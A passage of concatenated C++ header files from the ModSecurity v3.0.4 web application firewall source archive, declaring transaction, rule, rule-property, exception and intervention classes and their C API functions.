*logCbData); Transaction(ModSecurity *transaction, Rules *rules, char *id, void *logCbData); ~Transaction(); /** TODO: Should be an structure that fits an IP address */ int processConnection(const char *client, int cPort, const char *server, int sPort); int processURI(const char *uri, const char *protocol, const char *http_version); /** * Types of request body that ModSecurity may give a special treatment * for the data. */ enum RequestBodyType { /** * */ UnknownFormat, /** * */ MultiPartRequestBody, /** * */ WWWFormUrlEncoded, /** * */ JSONRequestBody, /** * */ XMLRequestBody }; int processRequestHeaders(); int addRequestHeader(const std::string& key, const std::string& value); int addRequestHeader(const unsigned char *key, const unsigned char *value); int addRequestHeader(const unsigned char *key, size_t len_key, const unsigned char *value, size_t len_value); int processRequestBody(); int appendRequestBody(const unsigned char *body, size_t size); int requestBodyFromFile(const char *path); int processResponseHeaders(int code, const std::string& proto); int addResponseHeader(const std::string& key, const std::string& value); int addResponseHeader(const unsigned char *key, const unsigned char *value); int addResponseHeader(const unsigned char *key, size_t len_key, const unsigned char *value, size_t len_value); int processResponseBody(); int appendResponseBody(const unsigned char *body, size_t size); int processLogging(); int updateStatusCode(int status); bool intervention(ModSecurityIntervention *it); bool addArgument(const std::string& orig, const std::string& key, const std::string& value, size_t offset); bool extractArguments(const std::string &orig, const std::string& buf, size_t offset); const char *getResponseBody(); size_t getResponseBodyLength(); size_t getRequestBodyLength(); #ifndef NO_LOGS void debug(int, std::string) const; #endif void serverLog(std::shared_ptr rm); int getRuleEngineState(); std::string toJSON(int parts); std::string toOldAuditLogFormat(int parts, const std::string &trailer); std::string toOldAuditLogFormatIndex(const std::string &filename, double size, const std::string &md5); /** * Filled during the class instantiation, this variable can be later * used to fill the SecRule variable `duration'. The variable `duration' * is dynamic calculated, it is always relative to the value found in * m_creationTimeStamp. * * @note There is space for performance improvement. This value don't * need to be filled if there is no rule using the variable * `duration'. */ clock_t m_creationTimeStamp; /** * Holds the client IP address. */ std::string m_clientIpAddress; /** * Holds the HTTP version: 1.2, 2.0, 3.0 and so on.... */ std::string m_httpVersion; /** * Holds the server IP Address */ std::string m_serverIpAddress; /** * Holds the raw URI that was requested. */ std::string m_uri; /** * Holds the URI that was requests (without the query string). */ std::string m_uri_no_query_string_decoded; /** * Holds the combined size of all arguments, later used to fill the * variable ARGS_COMBINED_SIZE. */ double m_ARGScombinedSizeDouble; /** * Client tcp port. */ int m_clientPort; /** * This variable is set by the action `severity' and later can be * consulted via the SecLanguage variable HIGHEST_SEVERITY. */ int m_highestSeverityAction; /** * Holds the HTTP return code when it is known. If 0 nothing was * set. */ int m_httpCodeReturned; /** * Holds the server port. */ int m_serverPort; /** * ModSecurity instance used to start this transaction. Basically used * to fill the server log whenever is needed. */ ModSecurity *m_ms; /** * Holds the type of the request body, in case there is one. */ RequestBodyType m_requestBodyType; /** * Holds the request body "processor" */ RequestBodyType m_requestBodyProcessor; /** * Rules object utilized during this specific transaction. */ Rules *m_rules; /** * */ std::list m_ruleRemoveById; std::list > m_ruleRemoveByIdRange; /** * */ std::list m_ruleRemoveByTag; /** * */ std::list< std::pair > m_ruleRemoveTargetByTag; /** * */ std::list< std::pair > m_ruleRemoveTargetById; /** * */ int m_requestBodyAccess; /** * The list m_auditLogModifier contains modifications to the `auditlogs' * for this specific request, those modifications can happens via the * utilization of the action: `ctl:auditLogParts=' * */ std::list< std::pair > m_auditLogModifier; /** * This variable holds all the messages asked to be save by the utilization * of the actions: `log_data' and `msg'. These should be included on the * auditlogs. */ std::list m_rulesMessages; /** * Holds the request body, in case of any. */ std::ostringstream m_requestBody; /** * Holds the response body, in case of any. */ std::ostringstream m_responseBody; /** * Contains the unique ID of the transaction. Use by the variable * `UNIQUE_ID'. This unique id is also saved as part of the AuditLog. */ std::string m_id; /** * Holds the SecMarker name that this transaction should wait to perform * rules evaluation again. */ std::string m_marker; /** * Holds the amount of rules that should be skipped. If bigger than 0 the * current rule should be skipped and the number needs to be decreased. */ int m_skip_next; /** * If allow action was utilized, this variable holds the allow type. */ modsecurity::actions::disruptive::AllowType m_allowType; /** * Holds the decode URI. Notice that m_uri holds the raw version * of the URI. */ std::string m_uri_decoded; /** * Actions (disruptive?) that should be taken by the connector related to * that transaction. */ std::vector m_actions; ModSecurityIntervention m_it; /** * Holds the creation time stamp, using std::time. * * TODO: m_timeStamp and m_creationTimeStamp may be merged into a single * variable. */ time_t m_timeStamp; /** * Holds all the collections related to that transaction. */ collection::Collections m_collections; /** * Holds the whatever matched in the operation utilization. * That variable will be further used by the capture action. * */ std::list m_matched; RequestBodyProcessor::XML *m_xml; RequestBodyProcessor::JSON *m_json; int m_secRuleEngine; std::string m_variableDuration; std::map m_variableEnvs; std::string m_variableHighestSeverityAction; std::string m_variableRemoteUser; std::string m_variableTime; std::string m_variableTimeDay; std::string m_variableTimeEpoch; std::string m_variableTimeHour; std::string m_variableTimeMin; std::string m_variableTimeSec; std::string m_variableTimeWDay; std::string m_variableTimeYear; private: /** * Pointer to the callback function that will be called to fill * the web server (connector) log. */ void *m_logCbData; }; #endif #ifdef __cplusplus extern "C" { #endif /** @ingroup ModSecurity_C_API */ Transaction *msc_new_transaction(ModSecurity *ms, Rules *rules, void *logCbData); /** @ingroup ModSecurity_C_API */ Transaction *msc_new_transaction_with_id(ModSecurity *ms, Rules *rules, char *id, void *logCbData); /** @ingroup ModSecurity_C_API */ int msc_process_connection(Transaction *transaction, const char *client, int cPort, const char *server, int sPort); /** @ingroup ModSecurity_C_API */ int msc_process_request_headers(Transaction *transaction); /** @ingroup ModSecurity_C_API */ int msc_add_request_header(Transaction *transaction, const unsigned char *key, const unsigned char *value); /** @ingroup ModSecurity_C_API */ int msc_add_n_request_header(Transaction *transaction, const unsigned char *key, size_t len_key, const unsigned char *value, size_t len_value); /** @ingroup ModSecurity_C_API */ int msc_process_request_body(Transaction *transaction); /** @ingroup ModSecurity_C_API */ int msc_append_request_body(Transaction *transaction, const unsigned char *body, size_t size); /** @ingroup ModSecurity_C_API */ int msc_request_body_from_file(Transaction *transaction, const char *path); /** @ingroup ModSecurity_C_API */ int msc_process_response_headers(Transaction *transaction, int code, const char* protocol); /** @ingroup ModSecurity_C_API */ int msc_add_response_header(Transaction *transaction, const unsigned char *key, const unsigned char *value); /** @ingroup ModSecurity_C_API */ int msc_add_n_response_header(Transaction *transaction, const unsigned char *key, size_t len_key, const unsigned char *value, size_t len_value); /** @ingroup ModSecurity_C_API */ int msc_process_response_body(Transaction *transaction); /** @ingroup ModSecurity_C_API */ int msc_append_response_body(Transaction *transaction, const unsigned char *body, size_t size); /** @ingroup ModSecurity_C_API */ int msc_process_uri(Transaction *transaction, const char *uri, const char *protocol, const char *http_version); /** @ingroup ModSecurity_C_API */ const char *msc_get_response_body(Transaction *transaction); /** @ingroup ModSecurity_C_API */ size_t msc_get_response_body_length(Transaction *transaction); /** @ingroup ModSecurity_C_API */ size_t msc_get_request_body_length(Transaction *transaction); /** @ingroup ModSecurity_C_API */ void msc_transaction_cleanup(Transaction *transaction); /** @ingroup ModSecurity_C_API */ int msc_intervention(Transaction *transaction, ModSecurityIntervention *it); /** @ingroup ModSecurity_C_API */ int msc_process_logging(Transaction *transaction); /** @ingroup ModSecurity_C_API */ int msc_update_status_code(Transaction *transaction, int status); #ifdef __cplusplus } } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_TRANSACTION_H_ modsecurity-v3.0.4/headers/modsecurity/rules_properties.h0000644000175000017500000004044213607066010024251 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #include #endif #ifndef HEADERS_MODSECURITY_RULES_PROPERTIES_H_ #define HEADERS_MODSECURITY_RULES_PROPERTIES_H_ #include "modsecurity/modsecurity.h" #include "modsecurity/rule.h" #include "modsecurity/rules_exceptions.h" #include "modsecurity/actions/action.h" #include "modsecurity/audit_log.h" #define CODEPAGE_SEPARATORS " \t\n\r" #define merge_boolean_value(to, from, default) \ if (to == PropertyNotSetConfigBoolean) { \ to = (from == PropertyNotSetConfigBoolean) ? default : from; \ } #define merge_ruleengine_value(to, from, default) \ if (to == PropertyNotSetRuleEngine) { \ to = (from == PropertyNotSetRuleEngine) ? default : from; \ } #define merge_bodylimitaction_value(to, from, default) \ if (to == PropertyNotSetBodyLimitAction) { \ to = (from == PropertyNotSetBodyLimitAction) ? default : from; \ } #ifdef __cplusplus namespace modsecurity { class RulesExceptions; namespace Parser { class Driver; } using modsecurity::debug_log::DebugLog; using modsecurity::audit_log::AuditLog; /** @ingroup ModSecurity_CPP_API */ class ConfigInt { public: ConfigInt() : m_set(false), m_value(0) { } bool m_set; int m_value; void merge(ConfigInt *from) { if (m_set == true || from->m_set == false) { return; } m_set = true; m_value = from->m_value; return; } }; class ConfigDouble { public: ConfigDouble() : m_set(false), m_value(0) { } bool m_set; double m_value; void merge(ConfigDouble *from) { if (m_set == true || from->m_set == false) { return; } m_set = true; m_value = from->m_value; return; } }; class ConfigString { public: ConfigString() : m_set(false), m_value("") { } bool m_set; std::string m_value; void merge(ConfigString *from) { if (m_set == true || from->m_set == false) { return; } m_set = true; m_value = from->m_value; return; } }; class ConfigSet { public: ConfigSet() : m_set(false), m_clear(false) { } bool m_set; bool m_clear; std::set m_value; }; class UnicodeMapHolder { public: UnicodeMapHolder() { memset(m_data, -1, (sizeof(int)*65536)); }; int& operator[](int index) { return m_data[index]; } int operator[](int index) const { return m_data[index]; } int at(int index) const { return m_data[index]; } void change(int i, int a) { m_data[i] = a; } int m_data[65536]; }; class RulesProperties; class ConfigUnicodeMap { public: ConfigUnicodeMap() : m_set(false), m_unicodeCodePage(0), m_unicodeMapTable(NULL) { } static void loadConfig(std::string f, double codePage, RulesProperties *driver, std::string *errg); void merge(ConfigUnicodeMap *from) { if (from->m_set == false) { return; } m_set = true; m_unicodeCodePage = from->m_unicodeCodePage; m_unicodeMapTable = from->m_unicodeMapTable; return; } bool m_set; double m_unicodeCodePage; std::shared_ptr m_unicodeMapTable; }; class RulesProperties { public: RulesProperties() : m_auditLog(new AuditLog()), m_requestBodyLimitAction(PropertyNotSetBodyLimitAction), m_responseBodyLimitAction(PropertyNotSetBodyLimitAction), m_secRequestBodyAccess(PropertyNotSetConfigBoolean), m_secResponseBodyAccess(PropertyNotSetConfigBoolean), m_secXMLExternalEntity(PropertyNotSetConfigBoolean), m_tmpSaveUploadedFiles(PropertyNotSetConfigBoolean), m_uploadKeepFiles(PropertyNotSetConfigBoolean), m_debugLog(new DebugLog()), m_remoteRulesActionOnFailed(PropertyNotSetRemoteRulesAction), m_secRuleEngine(PropertyNotSetRuleEngine) { } explicit RulesProperties(DebugLog *debugLog) : m_auditLog(new AuditLog()), m_requestBodyLimitAction(PropertyNotSetBodyLimitAction), m_responseBodyLimitAction(PropertyNotSetBodyLimitAction), m_secRequestBodyAccess(PropertyNotSetConfigBoolean), m_secResponseBodyAccess(PropertyNotSetConfigBoolean), m_secXMLExternalEntity(PropertyNotSetConfigBoolean), m_tmpSaveUploadedFiles(PropertyNotSetConfigBoolean), m_uploadKeepFiles(PropertyNotSetConfigBoolean), m_debugLog(debugLog), m_remoteRulesActionOnFailed(PropertyNotSetRemoteRulesAction), m_secRuleEngine(PropertyNotSetRuleEngine) { } ~RulesProperties() { int i = 0; /** Cleanup the rules */ for (i = 0; i < modsecurity::Phases::NUMBER_OF_PHASES; i++) { std::vector rules = m_rules[i]; while (rules.empty() == false) { Rule *rule = rules.back(); rules.pop_back(); if (rule->refCountDecreaseAndCheck()) { rule = NULL; } } } for (i = 0; i < modsecurity::Phases::NUMBER_OF_PHASES; i++) { std::vector *tmp = &m_defaultActions[i]; while (tmp->empty() == false) { actions::Action *a = tmp->back(); tmp->pop_back(); if (a->refCountDecreaseAndCheck()) { a = NULL; } } } delete m_debugLog; delete m_auditLog; } /** * * */ enum ConfigBoolean { TrueConfigBoolean, FalseConfigBoolean, PropertyNotSetConfigBoolean }; /** * * The RuleEngine enumerator consists in mapping the different states * of the rule engine. * */ enum RuleEngine { /** * * Rules won't be evaluated if Rule Engine is set to DisabledRuleEngine * */ DisabledRuleEngine, /** * * Rules will be evaluated and disturb actions will take place if needed. * */ EnabledRuleEngine, /** * Rules will be evaluated but it won't generate any disruptive action. * */ DetectionOnlyRuleEngine, /** * */ PropertyNotSetRuleEngine }; /** * * Defines what actions should be taken in case the body (response or * request) is bigger than the expected size. * */ enum BodyLimitAction { /** * * Process partial * */ ProcessPartialBodyLimitAction, /** * * Reject the request * */ RejectBodyLimitAction, /** * */ PropertyNotSetBodyLimitAction }; /** * * Defines what actions should be taken in case the remote rules failed to * be downloaded (independent of the circumstances) * * */ enum OnFailedRemoteRulesAction { /** * * Abort * */ AbortOnFailedRemoteRulesAction, /** * * Warn on logging * */ WarnOnFailedRemoteRulesAction, /** * */ PropertyNotSetRemoteRulesAction }; static const char *ruleEngineStateString(RuleEngine i) { switch (i) { case DisabledRuleEngine: return "Disabled"; case EnabledRuleEngine: return "Enabled"; case DetectionOnlyRuleEngine: return "DetectionOnly"; case PropertyNotSetRuleEngine: return "PropertyNotSet/DetectionOnly"; } return NULL; } static std::string configBooleanString(ConfigBoolean i) { switch (i) { case TrueConfigBoolean: return "True"; case FalseConfigBoolean: return "False"; case PropertyNotSetConfigBoolean: return "Not set"; } return NULL; } static int mergeProperties(RulesProperties *from, RulesProperties *to, std::ostringstream *err) { int amount_of_rules = 0; amount_of_rules = appendRules(from->m_rules, to->m_rules, err); if (amount_of_rules < 0) { return amount_of_rules; } merge_ruleengine_value(to->m_secRuleEngine, from->m_secRuleEngine, PropertyNotSetRuleEngine); merge_boolean_value(to->m_secRequestBodyAccess, from->m_secRequestBodyAccess, PropertyNotSetConfigBoolean); merge_boolean_value(to->m_secResponseBodyAccess, from->m_secResponseBodyAccess, PropertyNotSetConfigBoolean); merge_boolean_value(to->m_secXMLExternalEntity, from->m_secXMLExternalEntity, PropertyNotSetConfigBoolean); merge_boolean_value(to->m_uploadKeepFiles, from->m_uploadKeepFiles, PropertyNotSetConfigBoolean); merge_boolean_value(to->m_tmpSaveUploadedFiles, from->m_tmpSaveUploadedFiles, PropertyNotSetConfigBoolean); to->m_requestBodyLimit.merge(&from->m_requestBodyLimit); to->m_responseBodyLimit.merge(&from->m_responseBodyLimit); merge_bodylimitaction_value(to->m_requestBodyLimitAction, from->m_requestBodyLimitAction, PropertyNotSetBodyLimitAction); merge_bodylimitaction_value(to->m_responseBodyLimitAction, from->m_responseBodyLimitAction, PropertyNotSetBodyLimitAction); to->m_uploadFileLimit.merge(&from->m_uploadFileLimit); to->m_uploadFileMode.merge(&from->m_uploadFileMode); to->m_uploadDirectory.merge(&from->m_uploadDirectory); to->m_uploadTmpDirectory.merge(&from->m_uploadTmpDirectory); to->m_secArgumentSeparator.merge(&from->m_secArgumentSeparator); to->m_secWebAppId.merge(&from->m_secWebAppId); to->m_unicodeMapTable.merge(&from->m_unicodeMapTable); to->m_httpblKey.merge(&from->m_httpblKey); to->m_exceptions.merge(&from->m_exceptions); to->m_components.insert(to->m_components.end(), from->m_components.begin(), from->m_components.end()); if (from->m_responseBodyTypeToBeInspected.m_set == true) { if (from->m_responseBodyTypeToBeInspected.m_clear == true) { to->m_responseBodyTypeToBeInspected.m_value.clear(); from->m_responseBodyTypeToBeInspected.m_value.clear(); } else { for (std::set::iterator it = from->m_responseBodyTypeToBeInspected.m_value.begin(); it != from->m_responseBodyTypeToBeInspected.m_value.end(); ++it) { to->m_responseBodyTypeToBeInspected.m_value.insert(*it); } } to->m_responseBodyTypeToBeInspected.m_set = true; } for (int i = 0; i < modsecurity::Phases::NUMBER_OF_PHASES; i++) { std::vector *actions_from = \ from->m_defaultActions+i; std::vector *actions_to = to->m_defaultActions+i; for (size_t j = 0; j < actions_from->size(); j++) { actions::Action *action = actions_from->at(j); action->refCountIncrease(); actions_to->push_back(action); } } if (to->m_auditLog) { std::string error; to->m_auditLog->merge(from->m_auditLog, &error); if (error.size() > 0) { *err << error; return -1; } } if (from->m_debugLog && to->m_debugLog && from->m_debugLog->isLogFileSet()) { if (to->m_debugLog->isLogFileSet() == false) { std::string error; to->m_debugLog->setDebugLogFile( from->m_debugLog->getDebugLogFile(), &error); if (error.size() > 0) { *err << error; return -1; } } } if (from->m_debugLog && to->m_debugLog && from->m_debugLog->isLogLevelSet()) { if (to->m_debugLog->isLogLevelSet() == false) { to->m_debugLog->setDebugLogLevel( from->m_debugLog->getDebugLogLevel()); } } return amount_of_rules; } static int appendRules( std::vector *from, std::vector *to, std::ostringstream *err) { int amount_of_rules = 0; // TODO: std::vector could be replaced with something more efficient. std::vector v; for (int i = 0; i < modsecurity::Phases::NUMBER_OF_PHASES; i++) { std::vector *rules_to = to+i; v.reserve(rules_to->size()); for (size_t z = 0; z < rules_to->size(); z++) { Rule *rule_ckc = rules_to->at(z); if (rule_ckc->m_secMarker == true) { continue; } v.push_back(rule_ckc->m_ruleId); } } std::sort (v.begin(), v.end()); for (int i = 0; i < modsecurity::Phases::NUMBER_OF_PHASES; i++) { std::vector *rules_from = from+i; std::vector *rules_to = to+i; for (size_t j = 0; j < rules_from->size(); j++) { Rule *rule = rules_from->at(j); if (std::binary_search(v.begin(), v.end(), rule->m_ruleId)) { if (err != NULL) { *err << "Rule id: " << std::to_string(rule->m_ruleId) \ << " is duplicated" << std::endl; } return -1; } amount_of_rules++; rule->refCountIncrease(); rules_to->push_back(rule); } } return amount_of_rules; } std::vector *getRulesForPhase(int phase) { if (phase >= modsecurity::Phases::NUMBER_OF_PHASES) { return NULL; } return &m_rules[phase]; } audit_log::AuditLog *m_auditLog; BodyLimitAction m_requestBodyLimitAction; BodyLimitAction m_responseBodyLimitAction; ConfigBoolean m_secRequestBodyAccess; ConfigBoolean m_secResponseBodyAccess; ConfigBoolean m_secXMLExternalEntity; ConfigBoolean m_tmpSaveUploadedFiles; ConfigBoolean m_uploadKeepFiles; ConfigDouble m_requestBodyLimit; ConfigDouble m_requestBodyNoFilesLimit; ConfigDouble m_responseBodyLimit; ConfigInt m_uploadFileLimit; ConfigInt m_uploadFileMode; DebugLog *m_debugLog; OnFailedRemoteRulesAction m_remoteRulesActionOnFailed; RuleEngine m_secRuleEngine; RulesExceptions m_exceptions; std::list m_components; std::ostringstream m_parserError; ConfigSet m_responseBodyTypeToBeInspected; ConfigString m_httpblKey; ConfigString m_uploadDirectory; ConfigString m_uploadTmpDirectory; ConfigString m_secArgumentSeparator; ConfigString m_secWebAppId; std::vector m_defaultActions[modsecurity::Phases::NUMBER_OF_PHASES]; std::vector m_rules[modsecurity::Phases::NUMBER_OF_PHASES]; ConfigUnicodeMap m_unicodeMapTable; }; #endif #ifdef __cplusplus } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_RULES_PROPERTIES_H_ modsecurity-v3.0.4/headers/modsecurity/rules_exceptions.h0000644000175000017500000000555713607066010024246 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #include #include #include #include #include #include #endif #ifndef HEADERS_MODSECURITY_RULES_EXCEPTIONS_H_ #define HEADERS_MODSECURITY_RULES_EXCEPTIONS_H_ #ifdef __cplusplus namespace modsecurity { namespace actions { class Action; } namespace variables { class Variable; } class RulesExceptions { public: RulesExceptions(); ~RulesExceptions(); bool load(const std::string &data, std::string *error); bool addRange(int a, int b); bool addNumber(int a); bool contains(int a); bool merge(RulesExceptions *from); bool loadRemoveRuleByMsg(const std::string &msg, std::string *error); bool loadRemoveRuleByTag(const std::string &msg, std::string *error); bool loadUpdateTargetByMsg(const std::string &msg, std::unique_ptr > > v, std::string *error); bool loadUpdateTargetByTag(const std::string &tag, std::unique_ptr > > v, std::string *error); bool loadUpdateTargetById(double id, std::unique_ptr > > v, std::string *error); bool loadUpdateActionById(double id, std::unique_ptr > > actions, std::string *error); std::unordered_multimap, std::shared_ptr> m_variable_update_target_by_tag; std::unordered_multimap, std::shared_ptr> m_variable_update_target_by_msg; std::unordered_multimap> m_variable_update_target_by_id; std::unordered_multimap> m_action_pre_update_target_by_id; std::unordered_multimap> m_action_pos_update_target_by_id; std::list m_remove_rule_by_msg; std::list m_remove_rule_by_tag; private: std::list > m_ranges; std::list m_numbers; }; } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_RULES_EXCEPTIONS_H_ modsecurity-v3.0.4/headers/modsecurity/rules.h0000644000175000017500000000517713607066010022003 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #ifdef __cplusplus #include #include #include #include #include #endif #ifndef HEADERS_MODSECURITY_RULES_H_ #define HEADERS_MODSECURITY_RULES_H_ #include "modsecurity/rules_properties.h" #include "modsecurity/modsecurity.h" #include "modsecurity/transaction.h" #ifdef __cplusplus namespace modsecurity { class Rule; namespace Parser { class Driver; } /** @ingroup ModSecurity_CPP_API */ class Rules : public RulesProperties { public: Rules() : RulesProperties(new DebugLog()), unicode_codepage(0), #ifndef NO_LOGS m_secmarker_skipped(0), #endif m_referenceCount(0) { } explicit Rules(DebugLog *customLog) : RulesProperties(customLog), unicode_codepage(0), #ifndef NO_LOGS m_secmarker_skipped(0), #endif m_referenceCount(0) { } ~Rules() { } void incrementReferenceCount(void); void decrementReferenceCount(void); int loadFromUri(const char *uri); int loadRemote(const char *key, const char *uri); int load(const char *rules); int load(const char *rules, const std::string &ref); void dump(); int merge(Parser::Driver *driver); int merge(Rules *rules); int evaluate(int phase, Transaction *transaction); std::string getParserError(); void debug(int level, const std::string &id, const std::string &uri, const std::string &msg); int64_t unicode_codepage; private: int m_referenceCount; #ifndef NO_LOGS uint8_t m_secmarker_skipped; #endif }; #endif #ifdef __cplusplus extern "C" { #endif Rules *msc_create_rules_set(void); void msc_rules_dump(Rules *rules); int msc_rules_merge(Rules *rules_dst, Rules *rules_from, const char **error); int msc_rules_add_remote(Rules *rules, const char *key, const char *uri, const char **error); int msc_rules_add_file(Rules *rules, const char *file, const char **error); int msc_rules_add(Rules *rules, const char *plain_rules, const char **error); int msc_rules_cleanup(Rules *rules); #ifdef __cplusplus } } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_RULES_H_ modsecurity-v3.0.4/headers/modsecurity/rule_message.h0000644000175000017500000000620313607066010023313 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #endif #ifndef HEADERS_MODSECURITY_RULE_MESSAGE_H_ #define HEADERS_MODSECURITY_RULE_MESSAGE_H_ #include "modsecurity/transaction.h" #include "modsecurity/rule.h" #ifdef __cplusplus namespace modsecurity { class RuleMessage { public: enum LogMessageInfo { ErrorLogTailLogMessageInfo = 2, ClientLogMessageInfo = 4 }; explicit RuleMessage(Rule *rule, Transaction *trans) : m_accuracy(rule->m_accuracy), m_clientIpAddress(trans->m_clientIpAddress), m_data(""), m_id(trans->m_id), m_isDisruptive(false), m_match(""), m_maturity(rule->m_maturity), m_message(""), m_noAuditLog(false), m_phase(rule->m_phase - 1), m_reference(""), m_rev(rule->m_rev), m_rule(rule), m_ruleFile(rule->m_fileName), m_ruleId(rule->m_ruleId), m_ruleLine(rule->m_lineNumber), m_saveMessage(true), m_serverIpAddress(trans->m_serverIpAddress), m_severity(0), m_uriNoQueryStringDecoded(trans->m_uri_no_query_string_decoded), m_ver(rule->m_ver) { } std::string log() { return RuleMessage::log(this, 0); } std::string log(int props) { return RuleMessage::log(this, props); } std::string log(int props, int responseCode) { return RuleMessage::log(this, props, responseCode); } std::string errorLog() { return RuleMessage::log(this, ClientLogMessageInfo | ErrorLogTailLogMessageInfo); } static std::string log(const RuleMessage *rm, int props, int code); static std::string log(const RuleMessage *rm, int props) { return RuleMessage::log(rm, props, -1); } static std::string log(const RuleMessage *rm) { return RuleMessage::log(rm, 0); } static std::string _details(const RuleMessage *rm); static std::string _errorLogTail(const RuleMessage *rm); int m_accuracy; std::string m_clientIpAddress; std::string m_data; std::string m_id; bool m_isDisruptive; std::string m_match; int m_maturity; std::string m_message; bool m_noAuditLog; int m_phase; std::string m_reference; std::string m_rev; Rule *m_rule; std::string m_ruleFile; int m_ruleId; int m_ruleLine; bool m_saveMessage; std::string m_serverIpAddress; int m_severity; std::string m_uriNoQueryStringDecoded; std::string m_ver; std::list m_tags; }; } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_RULE_MESSAGE_H_ modsecurity-v3.0.4/headers/modsecurity/rule.h0000644000175000017500000001122713607066010021611 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifdef __cplusplus #include #include #include #include #include #include #endif #ifndef HEADERS_MODSECURITY_RULE_H_ #define HEADERS_MODSECURITY_RULE_H_ #include "modsecurity/transaction.h" #include "modsecurity/variable_value.h" #ifdef __cplusplus namespace modsecurity { namespace variables { class Variable; class Variables; } namespace actions { class Action; class Severity; class LogData; class Msg; class Rev; class SetVar; class Tag; } namespace operators { class Operator; } class Rule { public: Rule(operators::Operator *_op, variables::Variables *_variables, std::vector *_actions, std::string fileName, int lineNumber); explicit Rule(std::string marker); virtual ~Rule(); virtual bool evaluate(Transaction *transaction, std::shared_ptr rm); void organizeActions(std::vector *actions); void cleanUpActions(); void executeAction(Transaction *trans, bool containsBlock, std::shared_ptr ruleMessage, actions::Action *a, bool context); inline void executeTransformation(actions::Action *a, std::shared_ptr *value, Transaction *trans, std::list, std::shared_ptr>> *ret, std::string *path, int *nth); void getVariablesExceptions(Transaction *t, variables::Variables *exclusion, variables::Variables *addition); inline void getFinalVars(variables::Variables *vars, variables::Variables *eclusion, Transaction *trans); void executeActionsAfterFullMatch(Transaction *trasn, bool containsDisruptive, std::shared_ptr ruleMessage); std::list, std::shared_ptr>> executeDefaultTransformations( Transaction *trasn, const std::string &value); bool executeOperatorAt(Transaction *trasn, std::string key, std::string value, std::shared_ptr rm); void executeActionsIndependentOfChainedRuleResult(Transaction *trasn, bool *b, std::shared_ptr ruleMessage); inline void updateMatchedVars(Transaction *trasn, const std::string &key, const std::string &value); inline void cleanMatchedVars(Transaction *trasn); std::vector getActionsByName(const std::string& name, Transaction *t); bool containsTag(const std::string& name, Transaction *t); bool containsMsg(const std::string& name, Transaction *t); int refCountDecreaseAndCheck() { m_referenceCount--; if (m_referenceCount == 0) { delete this; return 1; } return 0; } void refCountIncrease() { m_referenceCount++; } void executeTransformations( actions::Action *a, std::shared_ptr newValue, std::shared_ptr value, Transaction *trans, std::list, std::shared_ptr>> *ret, std::shared_ptr transStr, int nth); actions::Action *m_theDisruptiveAction; actions::LogData *m_logData; actions::Msg *m_msg; actions::Severity *m_severity; bool m_chained; bool m_containsCaptureAction; bool m_containsMultiMatchAction; bool m_containsStaticBlockAction; bool m_secMarker; int64_t m_ruleId; int m_accuracy; int m_lineNumber; int m_maturity; int m_phase; modsecurity::variables::Variables *m_variables; operators::Operator *m_op; Rule *m_chainedRuleChild; Rule *m_chainedRuleParent; std::string m_fileName; std::string m_marker; std::string m_rev; std::string m_ver; std::vector m_actionsRuntimePos; std::vector m_actionsRuntimePre; std::vector m_actionsSetVar; std::vector m_actionsTag; private: bool m_unconditional; int m_referenceCount; }; } // namespace modsecurity #endif #endif // HEADERS_MODSECURITY_RULE_H_ modsecurity-v3.0.4/headers/modsecurity/intervention.h0000644000175000017500000000316113607066010023364 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #ifndef HEADERS_MODSECURITY_INTERVENTION_H_ #define HEADERS_MODSECURITY_INTERVENTION_H_ #ifdef __cplusplus namespace modsecurity { #endif typedef struct ModSecurityIntervention_t { int status; int pause; char *url; char *log; int disruptive; } ModSecurityIntervention; #ifdef __cplusplus namespace intervention { static void reset(ModSecurityIntervention_t *i) { i->status = 200; i->pause = 0; i->disruptive = 0; } static void clean(ModSecurityIntervention_t *i) { i->url = NULL; i->log = NULL; reset(i); } static void freeUrl(ModSecurityIntervention_t *i) { if (i->url) 